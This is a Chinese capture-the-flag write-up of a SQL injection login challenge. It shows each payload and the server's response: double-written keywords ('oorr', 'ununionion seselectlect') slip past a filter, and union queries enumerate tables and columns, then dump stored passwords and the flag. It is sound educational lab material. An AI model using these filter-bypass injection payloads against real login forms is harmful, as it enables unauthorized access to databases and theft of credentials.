打开题目,输入测试语句
admin'
123
回显
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘123’’ at line 1
那么我们有理由怀疑查询username和password的SQL语句是同一句
admin';
123
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’ and password=‘123’’ at line 1
由此看来确实是,尝试万能登录方法
admin' or 1=1;#
123
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘1=1;#’ and password=‘123’’ at line 1
可能or被过滤了吧,双写?
admin' oorr 1=1;#
123
Hello admin!
Your password is ‘93ac0dc744e89090a3c21f45478ce99f’
现在可以看到从数据库查询的内容了,先看看字段数
admin' oorr 1=1 oorrder by 3;#
123
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘3;#’ and password=‘123’’ at line 1
by也被过滤了?
admin' oorr 1=1 oorrder bbyy 3;#
123
Hello admin!
Your password is ‘93ac0dc744e89090a3c21f45478ce99f’
确实是过滤了,但问题不大,
admin' oorr 1=1 oorrder bbyy 4;#
123
Unknown column ‘4’ in ‘order clause’
三个字段,看看回显的是哪个
admin' oorr 1=1 union select 1,2,3 limit 1,1;#
123
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘1,2,3 limit 1,1;#’ and password=‘123’’ at line 1
继续双写
admin' oorr 1=1 ununionion seselectlect 1,2,3 limit 1,1;#
123
Hello 2!
Your password is ‘3’
那么接下来就好办了
admin' oorr 1=1 ununionion seselectlect 1,database(),version() limit 1,1;#
123
Hello geek!
Your password is ‘10.3.18-MariaDB’
开始查表
admin' oorr 1=1 ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' limit 1,1;#
123
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘.tables table_schema=‘geek’ limit 1,1;#’ and password=‘123’’ at line 1
继续双写
admin' oorr 1=1 ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='geek' limit 1,1;#
123
Hello 2!
Your password is ‘b4bsql,geekuser’
按照惯例,flag应该会在b4bsql里面
admin' oorr 1=1 ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql' limit 1,1;#
123
Hello 2!
Your password is ‘id,username,password’
admin' oorr 1=1 ununionion seselectlect 1,2,group_concat(passwoorrd) frfromom b4bsql limit 1,1;#
123
Hello 2!
Your password is ‘i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{eb678796-af39-47c7-ae9d-fc5d626c3940}’